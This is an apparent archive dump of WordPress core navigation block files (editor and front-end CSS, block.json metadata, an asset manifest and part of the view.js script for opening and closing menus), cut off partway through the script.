.block-editor-button-block-appender{background-color:initial;color:#1e1e1e}@keyframes loadingpulse{0%{opacity:1}50%{opacity:.5}to{opacity:1}}.components-placeholder.wp-block-navigation-placeholder{background:none;box-shadow:none;color:inherit;min-height:0;outline:none;padding:0}.components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset{font-size:inherit}.components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset .components-button{margin-bottom:0}.wp-block-navigation.is-selected .components-placeholder.wp-block-navigation-placeholder{color:#1e1e1e}.wp-block-navigation-placeholder__preview{align-items:center;background:#0000;color:currentColor;display:flex;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;min-width:96px}.wp-block-navigation.is-selected .wp-block-navigation-placeholder__preview{display:none}.wp-block-navigation-placeholder__preview:before{border:1px dashed;border-radius:2px;border-radius:inherit;bottom:0;content:"";display:block;left:0;pointer-events:none;position:absolute;right:0;top:0}.wp-block-navigation-placeholder__preview:before:before{background:currentColor;bottom:0;content:"";left:0;opacity:.1;pointer-events:none;position:absolute;right:0;top:0}.wp-block-navigation-placeholder__preview>svg{fill:currentColor}.wp-block-navigation.is-vertical .is-medium .components-placeholder__fieldset,.wp-block-navigation.is-vertical .is-small .components-placeholder__fieldset{min-height:90px}.wp-block-navigation.is-vertical .is-large .components-placeholder__fieldset{min-height:132px}.wp-block-navigation-placeholder__controls,.wp-block-navigation-placeholder__preview{align-items:flex-start;flex-direction:row;padding:6px 8px}.wp-block-navigation-placeholder__controls{background-color:#fff;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;display:none;float:right;position:relative;width:100%;z-index:1}.wp-block-navigation.is-selected .wp-block-navigation-placeholder__controls{display:flex}.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr{display:none}.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions{align-items:flex-start;flex-direction:column}.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr{display:none}.wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__icon{height:36px;margin-left:12px}.wp-block-navigation-placeholder__actions__indicator{align-items:center;display:flex;height:36px;justify-content:flex-start;line-height:0;margin-right:4px;padding:0 0 0 6px}.wp-block-navigation-placeholder__actions__indicator svg{margin-left:4px;fill:currentColor}.wp-block-navigation .components-placeholder.is-medium .components-placeholder__fieldset{flex-direction:row!important}.wp-block-navigation-placeholder__actions{align-items:center;display:flex;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;gap:6px;height:100%}.wp-block-navigation-placeholder__actions .components-dropdown,.wp-block-navigation-placeholder__actions>.components-button{margin-left:0}.wp-block-navigation-placeholder__actions.wp-block-navigation-placeholder__actions hr{background-color:#1e1e1e;border:0;height:100%;margin:auto 0;max-height:16px;min-height:1px;min-width:1px}@media (min-width:600px){.wp-block-navigation__responsive-container:not(.is-menu-open) .components-button.wp-block-navigation__responsive-container-close{display:none}}.wp-block-navigation__responsive-container.is-menu-open{position:fixed;top:155px}@media (min-width:782px){.wp-block-navigation__responsive-container.is-menu-open{right:36px;top:93px}}@media (min-width:960px){.wp-block-navigation__responsive-container.is-menu-open{right:160px}}@media (min-width:782px){.has-fixed-toolbar .wp-block-navigation__responsive-container.is-menu-open{top:141px}}.is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{top:141px}.is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{right:0;top:155px}@media (min-width:782px){.is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{top:61px}.is-fullscreen-mode .has-fixed-toolbar .wp-block-navigation__responsive-container.is-menu-open{top:109px}}.is-fullscreen-mode .is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-fullscreen-mode .is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{top:109px}body.editor-styles-wrapper .wp-block-navigation__responsive-container.is-menu-open{bottom:0;left:0;right:0;top:0}.components-button.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close,.components-button.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{color:inherit;height:auto;padding:0}.components-heading.wp-block-navigation-off-canvas-editor__title{margin:0}.wp-block-navigation-off-canvas-editor__header{margin-bottom:8px}.is-menu-open .wp-block-navigation__responsive-container-content * .block-list-appender{margin-top:16px}@keyframes fadein{0%{opacity:0}to{opacity:1}}.wp-block-navigation__loading-indicator-container{padding:8px 12px}.wp-block-navigation .wp-block-navigation__uncontrolled-inner-blocks-loading-indicator{margin-top:0}@keyframes fadeouthalf{0%{opacity:1}to{opacity:.5}}.wp-block-navigation-delete-menu-button{justify-content:center;margin-bottom:16px;width:100%}.components-button.is-link.wp-block-navigation-manage-menus-button{margin-bottom:16px}.wp-block-navigation__overlay-menu-preview{align-items:center;background-color:#f0f0f0;display:flex;height:64px;justify-content:space-between;margin-bottom:12px;padding:0 24px;width:100%}.wp-block-navigation__overlay-menu-preview.open{background-color:#fff;box-shadow:inset 0 0 0 1px #e0e0e0;outline:1px solid #0000}.wp-block-navigation-placeholder__actions hr+hr,.wp-block-navigation__toolbar-menu-selector.components-toolbar-group:empty{display:none}.wp-block-navigation__navigation-selector{margin-bottom:16px;width:100%}.wp-block-navigation__navigation-selector-button{border:1px solid;justify-content:space-between;width:100%}.wp-block-navigation__navigation-selector-button__icon{flex:0 0 auto}.wp-block-navigation__navigation-selector-button__label{flex:0 1 auto;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.wp-block-navigation__navigation-selector-button--createnew{border:1px solid;margin-bottom:16px;width:100%}.wp-block-navigation__responsive-container-open.components-button{opacity:1}.wp-block-navigation__menu-inspector-controls{overflow-x:auto;scrollbar-color:#0000 #0000;scrollbar-gutter:stable both-edges;scrollbar-width:thin;will-change:transform}.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar{height:12px;width:12px}.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-track{background-color:initial}.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:initial;border:3px solid #0000;border-radius:8px}.wp-block-navigation__menu-inspector-controls:focus-within::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:focus::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:hover::-webkit-scrollbar-thumb{background-color:#949494}.wp-block-navigation__menu-inspector-controls:focus,.wp-block-navigation__menu-inspector-controls:focus-within,.wp-block-navigation__menu-inspector-controls:hover{scrollbar-color:#949494 #0000}@media (hover:none){.wp-block-navigation__menu-inspector-controls{scrollbar-color:#949494 #0000}}.wp-block-navigation__menu-inspector-controls__empty-message{margin-right:24px}navigation/block.json000060400000006340151330427370010674 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/navigation",
	"title": "Navigation",
	"category": "theme",
	"allowedBlocks": [
		"core/navigation-link",
		"core/search",
		"core/social-links",
		"core/page-list",
		"core/spacer",
		"core/home-link",
		"core/site-title",
		"core/site-logo",
		"core/navigation-submenu",
		"core/loginout",
		"core/buttons"
	],
	"description": "A collection of blocks that allow visitors to get around your site.",
	"keywords": [ "menu", "navigation", "links" ],
	"textdomain": "default",
	"attributes": {
		"ref": {
			"type": "number"
		},
		"textColor": {
			"type": "string"
		},
		"customTextColor": {
			"type": "string"
		},
		"rgbTextColor": {
			"type": "string"
		},
		"backgroundColor": {
			"type": "string"
		},
		"customBackgroundColor": {
			"type": "string"
		},
		"rgbBackgroundColor": {
			"type": "string"
		},
		"showSubmenuIcon": {
			"type": "boolean",
			"default": true
		},
		"openSubmenusOnClick": {
			"type": "boolean",
			"default": false
		},
		"overlayMenu": {
			"type": "string",
			"default": "mobile"
		},
		"icon": {
			"type": "string",
			"default": "handle"
		},
		"hasIcon": {
			"type": "boolean",
			"default": true
		},
		"__unstableLocation": {
			"type": "string"
		},
		"overlayBackgroundColor": {
			"type": "string"
		},
		"customOverlayBackgroundColor": {
			"type": "string"
		},
		"overlayTextColor": {
			"type": "string"
		},
		"customOverlayTextColor": {
			"type": "string"
		},
		"maxNestingLevel": {
			"type": "number",
			"default": 5
		},
		"templateLock": {
			"type": [ "string", "boolean" ],
			"enum": [ "all", "insert", "contentOnly", false ]
		}
	},
	"providesContext": {
		"textColor": "textColor",
		"customTextColor": "customTextColor",
		"backgroundColor": "backgroundColor",
		"customBackgroundColor": "customBackgroundColor",
		"overlayTextColor": "overlayTextColor",
		"customOverlayTextColor": "customOverlayTextColor",
		"overlayBackgroundColor": "overlayBackgroundColor",
		"customOverlayBackgroundColor": "customOverlayBackgroundColor",
		"fontSize": "fontSize",
		"customFontSize": "customFontSize",
		"showSubmenuIcon": "showSubmenuIcon",
		"openSubmenusOnClick": "openSubmenusOnClick",
		"style": "style",
		"maxNestingLevel": "maxNestingLevel"
	},
	"supports": {
		"align": [ "wide", "full" ],
		"ariaLabel": true,
		"html": false,
		"inserter": true,
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontStyle": true,
			"__experimentalFontWeight": true,
			"__experimentalTextTransform": true,
			"__experimentalFontFamily": true,
			"__experimentalLetterSpacing": true,
			"__experimentalTextDecoration": true,
			"__experimentalSkipSerialization": [ "textDecoration" ],
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"spacing": {
			"blockGap": true,
			"units": [ "px", "em", "rem", "vh", "vw" ],
			"__experimentalDefaultControls": {
				"blockGap": true
			}
		},
		"layout": {
			"allowSwitching": false,
			"allowInheriting": false,
			"allowVerticalAlignment": false,
			"allowSizingOnChildren": true,
			"default": {
				"type": "flex"
			}
		},
		"interactivity": true,
		"renaming": false
	},
	"editorStyle": "wp-block-navigation-editor",
	"style": "wp-block-navigation"
}
navigation/style.min.css000060400000040000151330427370011332 0ustar00.wp-block-navigation{position:relative;--navigation-layout-justification-setting:flex-start;--navigation-layout-direction:row;--navigation-layout-wrap:wrap;--navigation-layout-justify:flex-start;--navigation-layout-align:center}.wp-block-navigation ul{margin-bottom:0;margin-left:0;margin-top:0;padding-left:0}.wp-block-navigation ul,.wp-block-navigation ul li{list-style:none;padding:0}.wp-block-navigation .wp-block-navigation-item{align-items:center;background-color:inherit;display:flex;position:relative}.wp-block-navigation .wp-block-navigation-item .wp-block-navigation__submenu-container:empty{display:none}.wp-block-navigation .wp-block-navigation-item__content{display:block}.wp-block-navigation .wp-block-navigation-item__content.wp-block-navigation-item__content{color:inherit}.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:focus{text-decoration:underline}.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:focus{text-decoration:line-through}.wp-block-navigation :where(a),.wp-block-navigation :where(a:active),.wp-block-navigation :where(a:focus){text-decoration:none}.wp-block-navigation .wp-block-navigation__submenu-icon{align-self:center;background-color:inherit;border:none;color:currentColor;display:inline-block;font-size:inherit;height:.6em;line-height:0;margin-left:.25em;padding:0;width:.6em}.wp-block-navigation .wp-block-navigation__submenu-icon svg{display:inline-block;stroke:currentColor;height:inherit;margin-top:.075em;width:inherit}.wp-block-navigation.is-vertical{--navigation-layout-direction:column;--navigation-layout-justify:initial;--navigation-layout-align:flex-start}.wp-block-navigation.no-wrap{--navigation-layout-wrap:nowrap}.wp-block-navigation.items-justified-center{--navigation-layout-justification-setting:center;--navigation-layout-justify:center}.wp-block-navigation.items-justified-center.is-vertical{--navigation-layout-align:center}.wp-block-navigation.items-justified-right{--navigation-layout-justification-setting:flex-end;--navigation-layout-justify:flex-end}.wp-block-navigation.items-justified-right.is-vertical{--navigation-layout-align:flex-end}.wp-block-navigation.items-justified-space-between{--navigation-layout-justification-setting:space-between;--navigation-layout-justify:space-between}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{align-items:normal;background-color:inherit;color:inherit;display:flex;flex-direction:column;height:0;left:-1px;opacity:0;overflow:hidden;position:absolute;top:100%;transition:opacity .1s linear;visibility:hidden;width:0;z-index:2}.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content{display:flex;flex-grow:1}.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content .wp-block-navigation__submenu-icon{margin-left:auto;margin-right:0}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation-item__content{margin:0}@media (min-width:782px){.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:100%;top:-1px}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{background:#0000;content:"";display:block;height:100%;position:absolute;right:100%;width:.5em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon{margin-right:.25em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon svg{transform:rotate(-90deg)}}.wp-block-navigation .has-child .wp-block-navigation-submenu__toggle[aria-expanded=true]~.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):hover>.wp-block-navigation__submenu-container,.wp-block-navigation .has-child:not(.open-on-click):not(.open-on-hover-click):focus-within>.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;overflow:visible;visibility:visible;width:auto}.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container{left:0;top:100%}@media (min-width:782px){.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:100%;top:0}}.wp-block-navigation-submenu{display:flex;position:relative}.wp-block-navigation-submenu .wp-block-navigation__submenu-icon svg{stroke:currentColor}button.wp-block-navigation-item__content{background-color:initial;border:none;color:currentColor;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-align:left;text-transform:inherit}.wp-block-navigation-submenu__toggle{cursor:pointer}.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle{padding-left:0;padding-right:.85em}.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle+.wp-block-navigation__submenu-icon{margin-left:-.6em;pointer-events:none}.wp-block-navigation-item.open-on-click button.wp-block-navigation-item__content:not(.wp-block-navigation-submenu__toggle){padding:0}.wp-block-navigation .wp-block-page-list,.wp-block-navigation__container,.wp-block-navigation__responsive-close,.wp-block-navigation__responsive-container,.wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-dialog{gap:inherit}:where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)){padding:.5em 1em}:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu button.wp-block-navigation-item__content),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-pages-list__item button.wp-block-navigation-item__content){padding:.5em 1em}.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container{left:auto;right:0}.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:-1px;right:-1px}@media (min-width:782px){.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:auto;right:100%}}.wp-block-navigation:not(.has-background) .wp-block-navigation__submenu-container{background-color:#fff;border:1px solid #00000026}.wp-block-navigation.has-background .wp-block-navigation__submenu-container{background-color:inherit}.wp-block-navigation:not(.has-text-color) .wp-block-navigation__submenu-container{color:#000}.wp-block-navigation__container{align-items:var(--navigation-layout-align,initial);display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial);list-style:none;margin:0;padding-left:0}.wp-block-navigation__container .is-responsive{display:none}.wp-block-navigation__container:only-child,.wp-block-page-list:only-child{flex-grow:1}@keyframes overlay-menu__fade-in-animation{0%{opacity:0;transform:translateY(.5em)}to{opacity:1;transform:translateY(0)}}.wp-block-navigation__responsive-container{bottom:0;display:none;left:0;position:fixed;right:0;top:0}.wp-block-navigation__responsive-container :where(.wp-block-navigation-item a){color:inherit}.wp-block-navigation__responsive-container .wp-block-navigation__responsive-container-content{align-items:var(--navigation-layout-align,initial);display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp-block-navigation__responsive-container:not(.is-menu-open.is-menu-open){background-color:inherit!important;color:inherit!important}.wp-block-navigation__responsive-container.is-menu-open{animation:overlay-menu__fade-in-animation .1s ease-out;animation-fill-mode:forwards;background-color:inherit;display:flex;flex-direction:column;overflow:auto;padding:clamp(1rem,var(--wp--style--root--padding-top),20rem) clamp(1rem,var(--wp--style--root--padding-right),20rem) clamp(1rem,var(--wp--style--root--padding-bottom),20rem) clamp(1rem,var(--wp--style--root--padding-left),20em);z-index:100000}@media (prefers-reduced-motion:reduce){.wp-block-navigation__responsive-container.is-menu-open{animation-delay:0s;animation-duration:1ms}}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content{align-items:var(--navigation-layout-justification-setting,inherit);display:flex;flex-direction:column;flex-wrap:nowrap;overflow:visible;padding-top:calc(2rem + 24px)}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{justify-content:flex-start}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-icon{display:none}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .has-child .wp-block-navigation__submenu-container{border:none;height:auto;min-width:200px;opacity:1;overflow:initial;padding-left:2rem;padding-right:2rem;position:static;visibility:visible;width:auto}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{gap:inherit}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{padding-top:var(--wp--style--block-gap,2em)}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item__content{padding:0}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{align-items:var(--navigation-layout-justification-setting,initial);display:flex;flex-direction:column}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item .wp-block-navigation__submenu-container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-page-list{background:#0000!important;color:inherit!important}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{left:auto;right:auto}@media (min-width:600px){.wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open){background-color:inherit;display:block;position:relative;width:100%;z-index:auto}.wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open) .wp-block-navigation__responsive-container-close{display:none}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{left:0}}.wp-block-navigation:not(.has-background) .wp-block-navigation__responsive-container.is-menu-open{background-color:#fff}.wp-block-navigation:not(.has-text-color) .wp-block-navigation__responsive-container.is-menu-open{color:#000}.wp-block-navigation__toggle_button_label{font-size:1rem;font-weight:700}.wp-block-navigation__responsive-container-close,.wp-block-navigation__responsive-container-open{background:#0000;border:none;color:currentColor;cursor:pointer;margin:0;padding:0;text-transform:inherit;vertical-align:middle}.wp-block-navigation__responsive-container-close svg,.wp-block-navigation__responsive-container-open svg{fill:currentColor;display:block;height:24px;pointer-events:none;width:24px}.wp-block-navigation__responsive-container-open{display:flex}.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{font-family:inherit;font-size:inherit;font-weight:inherit}@media (min-width:600px){.wp-block-navigation__responsive-container-open:not(.always-shown){display:none}}.wp-block-navigation__responsive-container-close{position:absolute;right:0;top:0;z-index:2}.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close{font-family:inherit;font-size:inherit;font-weight:inherit}.wp-block-navigation__responsive-close{width:100%}.has-modal-open .wp-block-navigation__responsive-close{margin-left:auto;margin-right:auto;max-width:var(--wp--style--global--wide-size,100%)}.wp-block-navigation__responsive-close:focus{outline:none}.is-menu-open .wp-block-navigation__responsive-close,.is-menu-open .wp-block-navigation__responsive-container-content,.is-menu-open .wp-block-navigation__responsive-dialog{box-sizing:border-box}.wp-block-navigation__responsive-dialog{position:relative}.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:46px}@media (min-width:782px){.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:32px}}html.has-modal-open{overflow:hidden}navigation/view.min.asset.php000060400000000124151330427370012264 0ustar00<?php return array('dependencies' => array(), 'version' => 'dfccca53c03e01ca94e5');
navigation/view.js000060400000020331151330427370010213 0ustar00import * as __WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__ from "@wordpress/interactivity";
/******/ // The require scope
/******/ var __webpack_require__ = {};
/******/ 
/************************************************************************/
/******/ /* webpack/runtime/define property getters */
/******/ (() => {
/******/ 	// define getter functions for harmony exports
/******/ 	__webpack_require__.d = (exports, definition) => {
/******/ 		for(var key in definition) {
/******/ 			if(__webpack_require__.o(definition, key) && !__webpack_require__.o(exports, key)) {
/******/ 				Object.defineProperty(exports, key, { enumerable: true, get: definition[key] });
/******/ 			}
/******/ 		}
/******/ 	};
/******/ })();
/******/ 
/******/ /* webpack/runtime/hasOwnProperty shorthand */
/******/ (() => {
/******/ 	__webpack_require__.o = (obj, prop) => (Object.prototype.hasOwnProperty.call(obj, prop))
/******/ })();
/******/ 
/************************************************************************/
var __webpack_exports__ = {};

;// CONCATENATED MODULE: external "@wordpress/interactivity"
var x = (y) => {
	var x = {}; __webpack_require__.d(x, y); return x
} 
var y = (x) => (() => (x))
const interactivity_namespaceObject = x({ ["getContext"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.getContext), ["getElement"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.getElement), ["store"]: () => (__WEBPACK_EXTERNAL_MODULE__wordpress_interactivity_8e89b257__.store) });
;// CONCATENATED MODULE: ./node_modules/@wordpress/block-library/build-module/navigation/view.js
/**
 * WordPress dependencies
 */

const focusableSelectors = ['a[href]', 'input:not([disabled]):not([type="hidden"]):not([aria-hidden])', 'select:not([disabled]):not([aria-hidden])', 'textarea:not([disabled]):not([aria-hidden])', 'button:not([disabled]):not([aria-hidden])', '[contenteditable]', '[tabindex]:not([tabindex^="-"])'];

// This is a fix for Safari in iOS/iPadOS. Without it, Safari doesn't focus out
// when the user taps in the body. It can be removed once we add an overlay to
// capture the clicks, instead of relying on the focusout event.
document.addEventListener('click', () => {});
const {
  state,
  actions
} = (0,interactivity_namespaceObject.store)('core/navigation', {
  state: {
    get roleAttribute() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      return ctx.type === 'overlay' && state.isMenuOpen ? 'dialog' : null;
    },
    get ariaModal() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      return ctx.type === 'overlay' && state.isMenuOpen ? 'true' : null;
    },
    get ariaLabel() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      return ctx.type === 'overlay' && state.isMenuOpen ? ctx.ariaLabel : null;
    },
    get isMenuOpen() {
      // The menu is opened if either `click`, `hover` or `focus` is true.
      return Object.values(state.menuOpenedBy).filter(Boolean).length > 0;
    },
    get menuOpenedBy() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      return ctx.type === 'overlay' ? ctx.overlayOpenedBy : ctx.submenuOpenedBy;
    }
  },
  actions: {
    openMenuOnHover() {
      const {
        type,
        overlayOpenedBy
      } = (0,interactivity_namespaceObject.getContext)();
      if (type === 'submenu' &&
      // Only open on hover if the overlay is closed.
      Object.values(overlayOpenedBy || {}).filter(Boolean).length === 0) {
        actions.openMenu('hover');
      }
    },
    closeMenuOnHover() {
      const {
        type,
        overlayOpenedBy
      } = (0,interactivity_namespaceObject.getContext)();
      if (type === 'submenu' &&
      // Only close on hover if the overlay is closed.
      Object.values(overlayOpenedBy || {}).filter(Boolean).length === 0) {
        actions.closeMenu('hover');
      }
    },
    openMenuOnClick() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      ctx.previousFocus = ref;
      actions.openMenu('click');
    },
    closeMenuOnClick() {
      actions.closeMenu('click');
      actions.closeMenu('focus');
    },
    openMenuOnFocus() {
      actions.openMenu('focus');
    },
    toggleMenuOnClick() {
      const ctx = (0,interactivity_namespaceObject.getContext)();
      const {
        ref
      } = (0,interactivity_namespaceObject.getElement)();
      // Safari won't send focus to the clicked element, so we need to manually place it: https://bugs.webkit.org/show_bug.cgi?id=22261
      if (window.document.activeElement !== ref) {
        ref.focus();
      }
      const {
        menuOpenedBy
      } = state;
      if (menuOpenedBy.click || menuOpenedBy.focus) {
        actions.closeMenu('click');
        actions.closeMenu('focus');
      } else {
        ctx.previousFocus = ref;
        actions.openMenu('click');
      }
    },
    handleMenuKeydown(event) {
      const {
        type,
        firstFocusableElement,
        lastFocusableElement
      } = (0,interactivity_namespaceObject.getContext)();
      if (state.menuOpenedBy.click) {
        // If Escape close the menu.
        if (event?.key === 'Escape') {
          actions.closeMenu('click');
          actions.closeMenu('focus');
          return;
        }

        // Trap focus if it is an overlay (main menu).
        if (type === 'overlay' && event.key === 'Tab') {
          // If shift + tab it change the direction.
          if (event.shiftKey && window.document.activeElement === firstFocusableElement) {
            event.preventDefault();
            lastFocusableElement.focus();
          } else if (!event.shiftKey && window.document.activeElement === lastFocusableElement) {
            event.preventDefault();
            firstFocusableElement.focus();
          }
        }
      }
    },
    handleMenuFocusout(event) {
      const {
        modal,
        type
      } = (0,interactivity_namespaceObject.getContext)();
      // If focus is outside modal, and in the document, close menu
      // event.target === The element losing focus
      // event.relatedTarget === The element receiving focus (if any)
      // When focusout is outside the document,
      // `window.document.activeElement` doesn't change.

      // The event.relatedTarget is null when something outside the navigation menu is clicked. This is only necessary for Safari.
      if (event.relatedTarget === null || !modal?.contains(event.relatedTarget) && event.target !== window.document.activeElement && type === 'submenu') {
        actions.closeMenu('click');
        actions.closeMenu('focus');
      }
    },
    openMenu(menuOpenedOn = 'click') {
      const {
        type
      } = (0,interactivity_namespaceObject.getContext)();
      state.menuOpenedBy[menuOpenedOn] = true;
      if (type === 'overlay') {
        // Add a `has-modal-open` class to the <html> root.
        document.documentElement.classList.add('has-modal-open');
      }
    },
    closeMenu(menuClosedOn = 'click') {
      const ctx = (0,interactivity_namespaceObject.getContext)();
